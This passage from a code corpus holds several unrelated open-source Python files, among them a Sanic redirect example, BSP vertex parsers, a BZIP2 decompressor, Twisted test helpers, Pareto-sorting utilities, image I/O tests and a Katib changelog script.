        name (): The name of the logger to save logs under.
    Returns:
        a decorator that wraps a function with logging logic.
"""
# TODO: Not Working - Breaks the code, tests does not pass (s3 connector, platform...)
# TODO: Fix problem with ExplicitParamValidation error (arguments not passed)
# TODO: Run ALL test suite of deci2 (NOT circieCI test suite, but ALL the tests under tests folders)
# TODO: Delete/Update all failing tests.
# def deci_logger_decorator(fn):
#
# @functools.wraps(fn)
# def wrapper_func(*args, **kwargs):
# try:
#
# try:
# logger.debug(f"Start: {fn.__name__}", extra={"args": args, "kwargs": kwargs})
# time1 = time.perf_counter()
# except Exception:
# # failed to write log - continue.
# pass
#
# result = fn(*args, **kwargs)
#
# try:
# time2 = time.perf_counter()
# logger.debug(f"End: {fn.__name__}",
# extra={'duration': (time2 - time1) * 1000.0, 'return_value': result})
# except Exception:
# # failed to write log - continue.
# pass
#
# return result
#
# except Exception as ex:
# # This exception was raised from inside the function call
# logger.error(f"Exception: {ex}", exc_info=ex)
# raise ex
#
# return wrapper_func
# if _func is None:
# logger = get_logger(name)
# return deci_logger_decorator
# else:
# logger = get_logger(_func.__name__)
# return deci_logger_decorator(_func)
return _func
def deci_class_logger():
"""
    This decorator wraps every class method with the deci_func_logger decorator.
    It works by checking whether each class attribute is callable and, if so, setting a decorated version under the same method name.
"""
def wrapper(cls):
# TODO: Not Working - Breaks the code, tests does not pass (s3 connector, platform...)
# TODO: Fix problem with ExplicitParamValidation error (arguments not passed)
# TODO: Run ALL test suite of deci2 (NOT circieCI test suite, but ALL the tests under tests folders)
# TODO: Delete/Update all failing tests.
# for attr in cls.__dict__:
# if callable(getattr(cls, attr)) and attr != '__init__':
# decorated_function = deci_func_logger(name=cls.__name__)(getattr(cls, attr))
# if type(cls.__dict__[attr]) is staticmethod:
# decorated_function = staticmethod(decorated_function)
# setattr(cls, attr, decorated_function)
return cls
return wrapper
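# A minimal sketch of the intended usage once the commented-out logic above is
# restored (ModelRepository and delete_model are made-up names):
#
#   @deci_class_logger()
#   class ModelRepository:
#       def fetch(self, model_id):
#           return {"id": model_id}
#
#   @deci_func_logger
#   def delete_model(model_id):
#       return True
#
# With the current placeholders, deci_class_logger() and the bare @deci_func_logger
# form simply return the class/function unchanged.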
|
examples/http_redirect.py | Varriount/sanic | 1,883 | 12635440 | from sanic import Sanic, response, text
from sanic.handlers import ErrorHandler
from sanic.server.async_server import AsyncioServer
HTTP_PORT = 9999
HTTPS_PORT = 8888
http = Sanic("http")
http.config.SERVER_NAME = f"localhost:{HTTP_PORT}"
https = Sanic("https")
https.config.SERVER_NAME = f"localhost:{HTTPS_PORT}"
@https.get("/foo")
def foo(request):
return text("foo")
@https.get("/bar")
def bar(request):
return text("bar")
@http.get("/<path:path>")
def proxy(request, path):
url = request.app.url_for(
"proxy",
path=path,
_server=https.config.SERVER_NAME,
_external=True,
_scheme="http",
)
return response.redirect(url)
@https.main_process_start
async def start(app, _):
http_server = await http.create_server(
port=HTTP_PORT, return_asyncio_server=True
)
app.add_task(runner(http, http_server))
app.ctx.http_server = http_server
app.ctx.http = http
@https.main_process_stop
async def stop(app, _):
await app.ctx.http_server.before_stop()
await app.ctx.http_server.close()
for connection in app.ctx.http_server.connections:
connection.close_if_idle()
await app.ctx.http_server.after_stop()
app.ctx.http = False
async def runner(app: Sanic, app_server: AsyncioServer):
app.is_running = True
try:
app.signalize()
app.finalize()
ErrorHandler.finalize(app.error_handler)
app_server.init = True
await app_server.before_start()
await app_server.after_start()
await app_server.serve_forever()
finally:
app.is_running = False
app.is_stopping = True
https.run(port=HTTPS_PORT, debug=True)
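# A quick way to exercise the redirect while this example is running (ports come
# from the constants defined above):
#
#   curl -i http://localhost:9999/foo   # responds with a redirect to http://localhost:8888/foo
#   curl -i http://localhost:8888/foo   # responds with "foo"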
|
library/source1/bsp/lumps/vertex_lump.py | BlenderAddonsArchive/SourceIO | 199 | 12635527 | import numpy as np
from .. import Lump, lump_tag
@lump_tag(3, 'LUMP_VERTICES')
class VertexLump(Lump):
def __init__(self, bsp, lump_id):
super().__init__(bsp, lump_id)
self.vertices = np.array([])
def parse(self):
reader = self.reader
self.vertices = np.frombuffer(reader.read(), np.float32)
self.vertices = self.vertices.reshape((-1, 3))
return self
@lump_tag(0x47, 'LUMP_UNLITVERTEX', bsp_version=29)
class UnLitVertexLump(Lump):
_dtype = np.dtype(
[
('vpi', np.uint32, (1,)),
('vni', np.uint32, (1,)),
('uv', np.float32, (2,)),
('unk', np.int32, (1,)),
]
)
def __init__(self, bsp, lump_id):
super().__init__(bsp, lump_id)
self.vertex_info = np.array([])
def parse(self):
reader = self.reader
self.vertex_info = np.frombuffer(reader.read(), self._dtype)
return self
@lump_tag(0x49, 'LUMP_BUMPLITVERTEX', bsp_version=29)
class BumpLitVertexLump(Lump):
_dtype = np.dtype(
[
('vpi', np.uint32, (1,)),
('vni', np.uint32, (1,)),
('uv', np.float32, (2,)),
('unk1', np.int32, (1,)),
('uv_lm', np.float32, (2,)),
('uv1', np.float32, (2,)),
('unk2', np.uint32, (2,)),
]
)
def __init__(self, bsp, lump_id):
super().__init__(bsp, lump_id)
self.vertex_info = np.array([])
def parse(self):
reader = self.reader
self.vertex_info = np.frombuffer(reader.read(), self._dtype)
return self
@lump_tag(0x4a, 'LUMP_UNLITTSVERTEX', bsp_version=29)
class UnlitTSVertexLump(Lump):
_dtype = np.dtype(
[
('vpi', np.uint32, (3,)),
('vni', np.uint32, (1,)),
('uv', np.float32, (2,)),
]
)
def __init__(self, bsp, lump_id):
super().__init__(bsp, lump_id)
self.vertex_info = np.array([])
def parse(self):
reader = self.reader
self.vertex_info = np.frombuffer(reader.read(), self._dtype)
return self
@lump_tag(0x4B, 'LUMP_BLINNPHONGVERTEX', bsp_version=29)
class BlinnPhongVertexLump(Lump):
_dtype = np.dtype(
[
('vpi', np.uint32, (3,)),
('vni', np.uint32, (1,)),
('unk', np.uint32, (2,)),
]
)
def __init__(self, bsp, lump_id):
super().__init__(bsp, lump_id)
self.vertex_info = np.array([])
def parse(self):
reader = self.reader
self.vertex_info = np.frombuffer(reader.read(), self._dtype)
return self
@lump_tag(0x4C, 'LUMP_R5VERTEX', bsp_version=29)
class R5VertexLump(Lump):
_dtype = np.dtype(
[
('vpi', np.uint32, (3,)),
('vni', np.uint32, (1,)),
('unk', np.uint32, (2,)),
('uv', np.float32, (2,)),
('uv_lm', np.float32, (2,)),
]
)
def __init__(self, bsp, lump_id):
super().__init__(bsp, lump_id)
self.vertex_info = np.array([])
def parse(self):
reader = self.reader
self.vertex_info = np.frombuffer(reader.read(), self._dtype)
return self
@lump_tag(0x4E, 'LUMP_R7VERTEX', bsp_version=29)
class R7VertexLump(Lump):
_dtype = np.dtype(
[
('vpi', np.uint32, (3,)),
('vni', np.uint32, (1,)),
('uv', np.float32, (2,)),
('neg_one', np.int32, (1,)),
]
)
def __init__(self, bsp, lump_id):
super().__init__(bsp, lump_id)
self.vertex_info = np.array([])
def parse(self):
reader = self.reader
self.vertex_info = np.frombuffer(reader.read(), self._dtype)
return self
|
dfvfs/compression/bzip2_decompressor.py | dfjxs/dfvfs | 176 | 12635533 |
# -*- coding: utf-8 -*-
"""The BZIP2 decompressor implementation."""
import bz2
from dfvfs.compression import decompressor
from dfvfs.compression import manager
from dfvfs.lib import definitions
from dfvfs.lib import errors
class BZIP2Decompressor(decompressor.Decompressor):
"""BZIP2 decompressor using bz2."""
COMPRESSION_METHOD = definitions.COMPRESSION_METHOD_BZIP2
def __init__(self):
"""Initializes a decompressor."""
super(BZIP2Decompressor, self).__init__()
self._bz2_decompressor = bz2.BZ2Decompressor()
def Decompress(self, compressed_data):
"""Decompresses the compressed data.
Args:
compressed_data (bytes): compressed data.
Returns:
tuple(bytes, bytes): uncompressed data and remaining compressed data.
Raises:
BackEndError: if the BZIP2 compressed stream cannot be decompressed.
"""
try:
uncompressed_data = self._bz2_decompressor.decompress(compressed_data)
remaining_compressed_data = getattr(
self._bz2_decompressor, 'unused_data', b'')
except (EOFError, IOError) as exception:
raise errors.BackEndError((
'Unable to decompress BZIP2 compressed stream with error: '
'{0!s}.').format(exception))
return uncompressed_data, remaining_compressed_data
manager.CompressionManager.RegisterDecompressor(BZIP2Decompressor)
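# A minimal usage sketch (not part of dfvfs itself): feed compressed bytes to
# Decompress() and keep the remaining, not-yet-consumed data for the next call.
#
#   import bz2
#   compressed = bz2.compress(b'example payload')
#   decompressor = BZIP2Decompressor()
#   uncompressed, remaining = decompressor.Decompress(compressed)
#   # uncompressed == b'example payload'; remaining holds any unused trailing bytes.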
|
tests/protocols/http/twisted_web_test_utils.py | paradiseng/jasmin | 750 | 12635534 | # https://gist.github.com/1873035#file_twisted_web_test_utils.py
import json
from io import StringIO
from twisted.internet.defer import succeed
from twisted.web import server, http_headers
from twisted.web.test.test_web import DummyRequest
from twisted.web.http import Request
class SmartDummyRequest(DummyRequest):
def __init__(self, method, url, args=None, json_data=None, headers=None):
DummyRequest.__init__(self, url.split(b'/'))
self.method = method
self.requestHeaders = http_headers.Headers(headers or {})
# set args
args = args or {}
for k, v in args.items():
if isinstance(k, str):
k = k.encode()
if isinstance(v, str):
v = v.encode()
self.addArg(k, v)
if json_data is not None:
self.content = StringIO(json.dumps(json_data))
else:
self.content = None
def value(self):
return b"".join(self.written)
class DummySite(server.Site):
def get(self, url, args=None):
return self._request(b"GET", url, args)
def post(self, url, args=None, json_data=None, headers=None):
if json_data is not None:
return self._request_json(b"POST", url, json_data, headers=headers)
else:
return self._request(b"POST", url, args, headers=headers)
def _request(self, method, url, args, headers=None):
request = SmartDummyRequest(method, url, args, headers=headers)
resource = self.getResourceFor(request)
result = resource.render(request)
return self._resolveResult(request, result)
def _request_json(self, method, url, json_data, headers=None):
request = SmartDummyRequest(method, url, json_data=json_data, headers=headers)
resource = self.getResourceFor(request)
result = resource.render(request)
return self._resolveResult(request, result)
def _resolveResult(self, request, result):
if isinstance(result, str):
request.write(result.encode())
request.finish()
return succeed(request)
elif isinstance(result, bytes):
request.write(result)
request.finish()
return succeed(request)
elif result is server.NOT_DONE_YET:
if request.finished:
return succeed(request)
else:
return request.notifyFinish().addCallback(lambda _: request)
else:
raise ValueError("Unexpected return value: %r" % (result,))
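# A minimal usage sketch (EchoResource is a made-up resource, not part of jasmin):
#
#   from twisted.web.resource import Resource
#
#   class EchoResource(Resource):
#       isLeaf = True
#       def render_GET(self, request):
#           return b'hello'
#
#   site = DummySite(EchoResource())
#   d = site.get(b'')
#   d.addCallback(lambda request: request.value())  # fires with b'hello'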
|
tests/extra/polar.py | aluhrs13/HPI | 1,026 | 12635575 |
from pathlib import Path
import sys
from importlib import reload
from my.core.common import get_valid_filename
ROOT = Path(__file__).parent.absolute()
OUTPUTS = ROOT / 'outputs'
import pytest # type: ignore
def test_hpi(prepare: str) -> None:
from my.polar import get_entries
assert len(list(get_entries())) > 1
def test_orger(prepare: str, tmp_path: Path) -> None:
from my.core.common import import_from, import_file
om = import_file(ROOT / 'orger/modules/polar.py')
# reload(om)
pv = om.PolarView() # type: ignore
# TODO hmm. worth making public?
OUTPUTS.mkdir(exist_ok=True)
out = OUTPUTS / (get_valid_filename(prepare) + '.org')
pv._run(to=out)
PARAMS = [
# 'data/polar/BojanKV_polar/.polar',
'',
# 'data/polar/TheCedarPrince_KnowledgeRepository',
# 'data/polar/coelias_polardocs',
# 'data/polar/warkdarrior_polar-document-repository'
]
@pytest.fixture(params=PARAMS)
def prepare(request):
dotpolar = request.param
class user_config:
        if dotpolar != '': # default
polar_dir = Path(ROOT / dotpolar)
defensive = False
import my.config
setattr(my.config, 'polar', user_config)
import my.polar as polar
reload(polar)
# TODO hmm... ok, need to document reload()
yield dotpolar
|
webhook/plugins/base.py | nobgr/xray | 7,086 | 12635580 | import logging
from cached_property import cached_property
from model.plugin import PluginMeta
from model.vuln import Statistics, WebVuln, ServiceVuln
class BasePlugin:
@cached_property
def meta(self) -> PluginMeta:
raise NotImplementedError("you should implement this method in your subclass")
@cached_property
def logger(self):
return logging.getLogger("plugin:" + self.meta.key)
def process_web_vuln(self, instance: str, vuln: WebVuln):
pass
def process_service_vuln(self, instance: str, vuln: ServiceVuln):
pass
def process_statistics(self, instance: str, statistics: Statistics):
pass
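# A minimal sketch of a concrete plugin (EchoPlugin is a made-up name; PluginMeta
# field names other than `key` are assumptions): subclasses provide `meta` and
# override only the process_* hooks they care about.
#
#   class EchoPlugin(BasePlugin):
#       @cached_property
#       def meta(self) -> PluginMeta:
#           return PluginMeta(key='echo', name='Echo plugin')
#
#       def process_web_vuln(self, instance: str, vuln: WebVuln):
#           self.logger.info('web vuln from %s: %s', instance, vuln)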
|
chocolate/mo/__init__.py | Intelecy/chocolate | 105 | 12635621 | from collections import defaultdict
import numpy
try:
# try importing the C version and set docstring
from .hv import hypervolume as __hv
except ImportError:
# fallback on python version
from .pyhv import hypervolume as __hv
def argsortNondominated(losses, k, first_front_only=False):
"""Sort input in Pareto-equal groups.
Sort the first *k* *losses* into different nondomination levels
using the "Fast Nondominated Sorting Approach" proposed by Deb et al.,
see [Deb2002]_. This algorithm has a time complexity of :math:`O(MN^2)`,
where :math:`M` is the number of objectives and :math:`N` the number of
losses.
:param losses: A list of losses to select from.
:param k: The number of elements to select.
:param first_front_only: If :obj:`True` sort only the first front and
exit.
:returns: A list of Pareto fronts (lists) containing the losses
index.
.. [Deb2002] Deb, Pratab, Agarwal, and Meyarivan, "A fast elitist
non-dominated sorting genetic algorithm for multi-objective
optimization: NSGA-II", 2002.
"""
if k == 0:
return []
loss2c = defaultdict(list)
for i, c in enumerate(losses):
loss2c[tuple(c)].append(i)
losses_keys = list(loss2c.keys())
current_front = []
next_front = []
dominating_losses = defaultdict(int)
dominated_losses = defaultdict(list)
# Rank first Pareto front
for i, li in enumerate(losses_keys):
for lj in losses_keys[i+1:]:
if dominates(li, lj):
dominating_losses[lj] += 1
dominated_losses[li].append(lj)
elif dominates(lj, li):
dominating_losses[li] += 1
dominated_losses[lj].append(li)
if dominating_losses[li] == 0:
current_front.append(li)
fronts = [[]]
for loss in current_front:
fronts[0].extend(loss2c[loss])
pareto_sorted = len(fronts[0])
if first_front_only:
return fronts[0]
# Rank the next front until at least the requested number
# candidates are sorted
N = min(len(losses), k)
while pareto_sorted < N:
fronts.append([])
for lp in current_front:
for ld in dominated_losses[lp]:
dominating_losses[ld] -= 1
if dominating_losses[ld] == 0:
next_front.append(ld)
pareto_sorted += len(loss2c[ld])
fronts[-1].extend(loss2c[ld])
current_front = next_front
next_front = []
return fronts
def dominates(loss1, loss2, obj=slice(None)):
"""Returns wether or not loss1 dominates loss2, while minimizing all
objectives.
"""
not_equal = False
for l1i, l2i in zip(loss1[obj], loss2[obj]):
if l1i < l2i:
not_equal = True
elif l1i > l2i:
return False
return not_equal
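# A small worked example of the two functions above (illustration only):
#
#   losses = [(1.0, 2.0), (2.0, 1.0), (2.0, 3.0)]
#   dominates((1.0, 2.0), (2.0, 3.0))         # True: better on every objective
#   dominates((1.0, 2.0), (2.0, 1.0))         # False: each wins on one objective
#   argsortNondominated(losses, len(losses))  # [[0, 1], [2]] -- two Pareto fronts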
def hypervolume(pointset, ref):
"""Computes the hypervolume of a point set.
Args:
pointset: A list of points.
ref: The origin from which to comute the hypervolume.
This value should be larger than all values in the
point set.
Returns:
The hypervolume of this point set.
"""
return __hv(pointset, ref)
def hypervolume_indicator(front, **kargs):
"""Indicator function using the hypervolume value.
Computes the contribution of each of the front candidates to the
front hypervolume. The hypervolume indicator assumes minimization.
Args:
front: A list of Pareto equal candidate solutions.
ref: The origin from which to compute the hypervolume (optional).
If not given, ref is set to the maximum value in each dimension + 1.
Returns:
The index of the least contributing candidate.
"""
# Hypervolume use implicit minimization
obj = numpy.array(front)
ref = kargs.get("ref", None)
if ref is None:
ref = numpy.max(obj, axis=0) + 1
def contribution(i):
# The contribution of point p_i in point set P
# is the hypervolume of P without p_i
return hypervolume(numpy.concatenate((obj[:i], obj[i+1:])), ref)
    contrib_values = list(map(contribution, range(len(front))))
    # Select the maximum hypervolume value (corresponds to the least contributing point)
return numpy.argmax(contrib_values) |
docs/release/changelog.py | oneconvergence/katib | 1,177 | 12635644 | from github import Github
import argparse
REPO_NAME = "kubeflow/katib"
CHANGELOG_FILE = "CHANGELOG.md"
parser = argparse.ArgumentParser()
parser.add_argument("--token", type=str, help="GitHub Access Token")
parser.add_argument("--range", type=str, help="Changelog is generated for this release range")
args = parser.parse_args()
if args.token is None:
raise Exception("GitHub Token must be set")
try:
previous_release = args.range.split("..")[0]
current_release = args.range.split("..")[1]
except Exception:
raise Exception("Release range must be set in this format: v0.11.0..v0.12.0")
# Get list of commits from the range.
github_repo = Github(args.token).get_repo(REPO_NAME)
comparison = github_repo.compare(previous_release, current_release)
commits = comparison.commits
# The latest commit contains the release date.
release_date = str(commits[-1].commit.author.date).split(" ")[0]
release_url = "https://github.com/{}/tree/{}".format(REPO_NAME, current_release)
# Get all PRs in reverse chronological order from the commits.
pr_list = ""
pr_set = set()
for commit in reversed(commits):
# Only add commits with PRs.
for pr in commit.get_pulls():
# Each PR is added only one time to the list.
if pr.number in pr_set:
continue
pr_set.add(pr.number)
new_pr = "- {title} ([#{id}]({pr_link}) by [@{user_id}]({user_url}))\n".format(
title=pr.title,
id=pr.number,
pr_link=pr.html_url,
user_id=pr.user.login,
user_url=pr.user.html_url
)
pr_list += new_pr
change_log = [
"# Changelog"
"\n\n",
"## [{}]({}) ({})".format(current_release, release_url, release_date),
"\n\n",
"## TODO: Group PRs into Features, Bug fixes, Documentation, etc. " +
"For example: [v0.11.0](https://github.com/kubeflow/katib/releases/tag/v0.11.0)",
"\n\n",
pr_list,
"\n"
"[Full Changelog]({})\n".format(comparison.html_url)]
# Update Changelog with the new changes.
with open(CHANGELOG_FILE, "r+") as f:
lines = f.readlines()
f.seek(0)
lines = lines[0:0] + change_log + lines[1:]
f.writelines(lines)
print("Changelog has been updated\n")
print("Group PRs in the Changelog into Features, Bug fixes, Documentation, etc.\n")
print("After that, submit a PR with the updated Changelog")
|
mahotas/tests/test_freeimage.py | odidev/mahotas | 541 | 12635646 | import numpy as np
from os import path
try:
from mahotas.io import freeimage
except OSError:
import pytest
pytestmark = pytest.mark.skip
def test_freeimage(tmpdir):
img = np.arange(256).reshape((16,16)).astype(np.uint8)
fname = tmpdir.join('mahotas_test.png')
freeimage.imsave(fname, img)
img_ = freeimage.imread(fname)
assert img.shape == img_.shape
assert np.all(img == img_)
def test_as_grey(tmpdir):
fname = tmpdir.join('mahotas_test.png')
colour = np.arange(16*16*3).reshape((16,16,3))
freeimage.imsave(fname, colour.astype(np.uint8))
c2 = freeimage.imread(fname, as_grey=True)
assert len(c2.shape) == 2
assert c2.shape == colour.shape[:-1]
def test_rgba():
rgba = path.join(
path.dirname(__file__),
'data',
'rgba.png')
rgba = freeimage.imread(rgba)
assert np.all(np.diff(rgba[:,:,3].mean(1)) < 0 ) # the image contains an alpha gradient
def test_save_load_rgba(tmpdir):
fname = tmpdir.join('mahotas_test.png')
img = np.arange(256).reshape((8,8,4)).astype(np.uint8)
freeimage.imsave(fname, img)
img_ = freeimage.imread(fname)
assert img.shape == img_.shape
assert np.all(img == img_)
def test_fromblob():
img = np.arange(100, dtype=np.uint8).reshape((10,10))
s = freeimage.imsavetoblob(img, 't.png')
assert np.all(freeimage.imreadfromblob(s) == img)
s = freeimage.imsavetoblob(img, 't.bmp')
assert np.all(freeimage.imreadfromblob(s) == img)
def test_1bpp():
bpp = path.join(
path.dirname(__file__),
'data',
'1bpp.bmp')
bpp = freeimage.imread(bpp)
assert bpp.sum()
assert bpp.sum() < bpp.size
def test_multi(tmpdir):
testtif = tmpdir.join('/mahotas_test.tif')
f = np.zeros((16,16), np.uint8)
fs = []
for t in range(8):
f[:t,:t] = t
fs.append(f.copy())
freeimage.write_multipage(fs, testtif)
fs2 = freeimage.read_multipage(testtif)
for f,f2 in zip(fs,fs2):
assert np.all(f == f2)
def test_uint16(tmpdir):
img = np.zeros((32,32), dtype=np.uint16)
fname = tmpdir.join('mahotas_test.png')
freeimage.imsave(fname, img)
img_ = freeimage.imread(fname)
assert img.shape == img_.shape
assert img.dtype == img_.dtype
assert np.all(img == img_)
|
tests/strings/string_format_i.py | MoonStarCZW/py2rb | 124 | 12635651 |
a = 1.123456
b = 10
c = -30
d = 34
e = 123.456
f = 19892122
# form 0
s = "b=%i" % b
print(s)
# form 1
s = "b,c,d=%i+%i+%i" % (b,c,d)
print(s)
# form 2
s = "b=%(b)i and c=%(c)i and d=%(d)i" % { 'b':b,'c':c,'d':d }
print(s)
# width,flags
s = "e=%020i e=%+i e=%20i e=%-20i (e=%- 20i)" % (e,e,e,e,e)
print(s)
|
人工智能/AI_Reversi/board.py | yunwei37/ZJU-CS-GIS-ClassNotes | 397 | 12635654 | #!/usr/bin/Anaconda3/python
# -*- coding: utf-8 -*-
class Board(object):
"""
    Board: an 8*8 Reversi (Othello) board. Black pieces are shown as X, white pieces as O, and empty squares as '.'.
"""
def __init__(self):
"""
        Initialize the board state.
"""
        self.empty = '.'  # marker for an empty square
        self._board = [[self.empty for _ in range(8)] for _ in range(8)]  # size: 8*8
        self._board[3][4] = 'X'  # black piece
        self._board[4][3] = 'X'  # black piece
        self._board[3][3], self._board[4][4] = 'O', 'O'  # white pieces
def __getitem__(self, index):
"""
        Add Board[][] indexing syntax.
        :param index: subscript index
:return:
"""
return self._board[index]
def display(self, step_time=None, total_time=None):
"""
        Print the board.
        :param step_time: time spent per move, e.g. {"X":1,"O":0}; defaults to None
        :param total_time: total time spent, e.g. {"X":1,"O":0}; defaults to None
:return:
"""
board = self._board
# print(step_time,total_time)
        # Print the column names
print(' ', ' '.join(list('ABCDEFGH')))
        # Print the row names and the board
for i in range(8):
# print(board)
print(str(i + 1), ' '.join(board[i]))
        if (not step_time) or (not total_time):
            # Times shown when the board is first initialized
            step_time = {"X": 0, "O": 0}
            total_time = {"X": 0, "O": 0}
            print("Game statistics: total pieces / time per move / total time ")
            print("Black: " + str(self.count('X')) + ' / ' + str(step_time['X']) + ' / ' + str(
                total_time['X']))
            print("White: " + str(self.count('O')) + ' / ' + str(step_time['O']) + ' / ' + str(
                total_time['O']) + '\n')
        else:
            # Times shown during a match
            print("Game statistics: total pieces / time per move / total time ")
            print("Black: " + str(self.count('X')) + ' / ' + str(step_time['X']) + ' / ' + str(
                total_time['X']))
            print("White: " + str(self.count('O')) + ' / ' + str(step_time['O']) + ' / ' + str(
                total_time['O']) + '\n')
def count(self, color):
"""
        Count the pieces belonging to color. (O: white, X: black, .: empty)
        :param color: [O,X,.] the different piece states on the board
        :return: the total number of color pieces on the board
"""
count = 0
for y in range(8):
for x in range(8):
if self._board[x][y] == color:
count += 1
return count
def get_winner(self):
"""
        Decide the winner between black and white by comparing piece counts.
        :return: 0 - black wins, 1 - white wins, 2 - draw (black and white have the same number of pieces)
"""
        # Initial counts of black and white pieces
black_count, white_count = 0, 0
for i in range(8):
for j in range(8):
                # Count black pieces
if self._board[i][j] == 'X':
black_count += 1
                # Count white pieces
if self._board[i][j] == 'O':
white_count += 1
if black_count > white_count:
            # Black wins
return 0, black_count - white_count
elif black_count < white_count:
            # White wins
return 1, white_count - black_count
elif black_count == white_count:
            # Draw: black and white have the same number of pieces
return 2, 0
def _move(self, action, color):
"""
        Place a piece and get the coordinates of the flipped pieces.
        :param action: the coordinate of the move; can be 'D3' or (2, 3)
        :param color: [O,X,.] the different piece states on the board
        :return: the list of flipped piece coordinates, or False if the move fails
"""
        # If action is a string, convert it to numeric coordinates
if isinstance(action, str):
action = self.board_num(action)
fliped = self._can_fliped(action, color)
if fliped:
            # Flip the opponent's pieces at the returned coordinates
for flip in fliped:
x, y = self.board_num(flip)
self._board[x][y] = color
            # Coordinates of the move
x, y = action
            # Update the board at the action coordinate; that square now holds color (one of [X, O, .])
self._board[x][y] = color
return fliped
else:
            # No pieces were flipped, so the move fails
return False
def backpropagation(self, action, flipped_pos, color):
"""
        Undo a move (backtrack).
        :param action: the coordinate of the move
        :param flipped_pos: the list of flipped piece coordinates
        :param color: piece state, one of [X, O, .]
:return:
"""
        # If action is a string, convert it to numeric coordinates
if isinstance(action, str):
action = self.board_num(action)
self._board[action[0]][action[1]] = self.empty
        # If color == 'X' then op_color = 'O'; otherwise op_color = 'X'
op_color = "O" if color == "X" else "X"
for p in flipped_pos:
            # If p is a string, convert it to numeric coordinates
if isinstance(p, str):
p = self.board_num(p)
self._board[p[0]][p[1]] = op_color
def is_on_board(self, x, y):
"""
        Check whether a coordinate is on the board.
        :param x: row coordinate
        :param y: col coordinate
:return: True or False
"""
return x >= 0 and x <= 7 and y >= 0 and y <= 7
def _can_fliped(self, action, color):
"""
        Check whether a move is legal; return False if not, otherwise return the list of pieces to flip.
        :param action: the position of the move
        :param color: [X, O, .] piece state
        :return: False, or the list of opponent piece coordinates to flip
"""
        # If action is a string, convert it to numeric coordinates
if isinstance(action, str):
action = self.board_num(action)
xstart, ystart = action
        # If the square is already occupied or off the board, return False
if not self.is_on_board(xstart, ystart) or self._board[xstart][ystart] != self.empty:
return False
        # Temporarily place color at the given position
self._board[xstart][ystart] = color
        # The opponent's color
op_color = "O" if color == "X" else "X"
        # Pieces to be flipped
flipped_pos = []
flipped_pos_board = []
for xdirection, ydirection in [[0, 1], [1, 1], [1, 0], [1, -1], [0, -1], [-1, -1], [-1, 0],
[-1, 1]]:
x, y = xstart, ystart
x += xdirection
y += ydirection
            # If (x, y) is on the board and holds an opponent piece, keep moving in this direction; otherwise try the next direction.
if self.is_on_board(x, y) and self._board[x][y] == op_color:
x += xdirection
y += ydirection
                # Check again whether (x, y) is on the board; if not, try the next direction, otherwise run the while loop.
if not self.is_on_board(x, y):
continue
                # Keep going until we run off the board or leave the opponent's pieces
while self._board[x][y] == op_color:
                    # While (x, y) stays on opponent pieces, keep stepping until it goes off the board or stops being an opponent piece.
x += xdirection
y += ydirection
                    # (x, y) went off the board
if not self.is_on_board(x, y):
break
                # Off the board: nothing to flip (pattern OXXXXX)
if not self.is_on_board(x, y):
continue
                # Reached one of our own pieces (pattern OXXXXXXO)
if self._board[x][y] == color:
while True:
x -= xdirection
y -= ydirection
                        # Stop once we are back at the starting point
if x == xstart and y == ystart:
break
                        # Record a piece that needs to be flipped
flipped_pos.append([x, y])
        # Remove the temporarily placed piece, i.e. restore the board
self._board[xstart][ystart] = self.empty # restore the empty space
        # If no pieces would be flipped, the move is illegal; return False
if len(flipped_pos) == 0:
return False
for fp in flipped_pos:
flipped_pos_board.append(self.num_board(fp))
        # The move is legal; return the board coordinates of the flipped pieces
return flipped_pos_board
def get_legal_actions(self, color):
"""
        Generate the legal moves for color according to the rules of Reversi.
        :param color: piece color, X - black, O - white
        :return: yields legal move coordinates; use list() to collect all of them
"""
        # The 8 direction offsets around a board square; e.g. the offset (-1, 0) points to the square directly above.
direction = [(-1, 0), (-1, 1), (0, 1), (1, 1), (1, 0), (1, -1), (0, -1), (-1, -1)]
op_color = "O" if color == "X" else "X"
        # Collect the empty squares adjacent to op_color pieces
op_color_near_points = []
board = self._board
for i in range(8):
            # i is the row index and j the column index, both starting from 0
for j in range(8):
                # Check the piece at board[i][j]; if it belongs to op_color, continue with the steps below,
                # otherwise move on to the next square
if board[i][j] == op_color:
                    # dx, dy are the row and column steps from [i][j]; direction holds the offsets
for dx, dy in direction:
x, y = i + dx, j + dy
                        # If x and y are within range, board[x][y] is empty, and (x, y) is not yet in
                        # op_color_near_points, add it to the list of empty squares adjacent to the opponent
if 0 <= x <= 7 and 0 <= y <= 7 and board[x][y] == self.empty and (
x, y) not in op_color_near_points:
op_color_near_points.append((x, y))
l = [0, 1, 2, 3, 4, 5, 6, 7]
for p in op_color_near_points:
if self._can_fliped(p, color):
                # If p is a numeric coordinate, convert it back to a board coordinate
# p = self.board_num(p)
if p[0] in l and p[1] in l:
p = self.num_board(p)
yield p
def board_num(self, action):
"""
        Convert a board coordinate to a numeric coordinate.
        :param action: board coordinate, e.g. A1
        :return: numeric coordinate, e.g. A1 ---> (0, 0)
"""
row, col = str(action[1]).upper(), str(action[0]).upper()
if row in '12345678' and col in 'ABCDEFGH':
            # Valid coordinate
x, y = '12345678'.index(row), 'ABCDEFGH'.index(col)
return x, y
def num_board(self, action):
"""
        Convert a numeric coordinate to a board coordinate.
        :param action: numeric coordinate, e.g. (0, 0)
        :return: board coordinate, e.g. (0, 0) ---> A1
"""
row, col = action
l = [0, 1, 2, 3, 4, 5, 6, 7]
if col in l and row in l:
return chr(ord('A') + col) + str(row + 1)
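# A small illustration of the two coordinate helpers above: board coordinates put
# the column letter first, numeric coordinates put the row index first.
#
#   board = Board()
#   board.board_num('D3')     # (2, 3): row '3' -> 2, column 'D' -> 3
#   board.num_board((2, 3))   # 'D3'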
# # # Test
# if __name__ == '__main__':
# board = Board() # initialize the board
# board.display()
# print("----------------------------------X",list(board.get_legal_actions('X')))
# # print("Place X at D2:", board._move('D2','X'))
# print("==========",'F1' in list(board.get_legal_actions('X')))
# # print('E2' in list(board.get_legal_actions('X')))
|
pipe-cli/src/api/folder.py | msleprosy/cloud-pipeline | 126 | 12635660 |
# Copyright 2017-2019 EPAM Systems, Inc. (https://www.epam.com/)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .base import API
from ..model.folder_model import FolderModel
class Folder(API):
def __init__(self):
super(Folder, self).__init__()
@classmethod
def load_tree(cls):
api = cls.instance()
